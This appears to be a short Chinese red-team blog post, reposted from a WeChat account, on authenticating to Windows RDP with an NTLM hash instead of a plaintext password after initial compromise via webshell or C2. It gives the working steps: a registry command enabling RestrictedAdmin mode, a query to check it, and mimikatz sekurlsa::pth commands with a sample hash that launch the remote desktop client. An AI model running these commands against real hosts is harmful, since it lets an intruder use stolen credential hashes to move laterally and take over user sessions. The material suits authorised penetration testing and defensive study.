免责声明
由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。所涉及工具来自网络,安全性自测。
技巧实景思考
在攻防项目中时常会遇到目标Windows主机系统版本为Windows 2012+ (或Windows 10),在这些高版本版本的安全机制下,认证机制的Lsass进程缓存中默认是不再进行存储明文密码,如果想取消该机制需要修改注册表参数并重新登录用户将明文密码写入到缓存中,否则只能提取用户密码哈希(NTLM-Hash)。但也正因为这一安全机制的存在,部分系统内置的服务可以直接用NTLM-Hash进行认证利用,如:RDP、WMI、WinRM等,不一定需要明文才能展开扩展测试。
在攻防演练中,攻击队已获得命令执行权限(Webshell、C2远控),想登录上指定用户的RDP进行获取更多成果细节,但由于高系统版本明文缓存限制与强口令哈希无法破解的情况,则可以通过PTH(Pass The Hash,传递Hash)这一方式进行认证RDP服务,这时候就不需要明文密码即可登入该用户的远程桌面进一步利用。
技巧细节
PTH-RDP前提条件:启用RestrictedAdmin mode(受限管理模式)
注意:服务端与客户端都要启用受限管理模式才能正常利用PTH。受限管理模式是微软为了提高系统安全性,使明文凭据(明文密码)不会暴露在目标系统网络传输过程中,防止明文被嗅探抓取。简单理解就是启用RDP中可以使用NTLM Hash或Kerberos票据进行认证。
启用该模式:REG ADD "HKLMSystemCurrentControlSetControlLsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
查询其结果:REG query "HKLMSystemCurrentControlSetControlLsa" | findstr "DisableRestrictedAdmin"
修改成果后,在本机上用mimikatz进行PTH认证RDP操作:
/user:PTH认证所使用的目标用户。
/domain:进行目标用户所处域,默认为工作组WORKGROUP。
/ntlm:目标用户NTLM-Hash。
privilege::debug
sekurlsa::pth /user:administrator /domain:WORKGROUP /ntlm:2933b53c26145546db391c629d7902bb "/run:mstsc.exe /restrictedadmin"
原文始发于微信公众号(划水但不摆烂):【攻防小词条02 | 内网渗透】非明文密码认证RDP服务
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论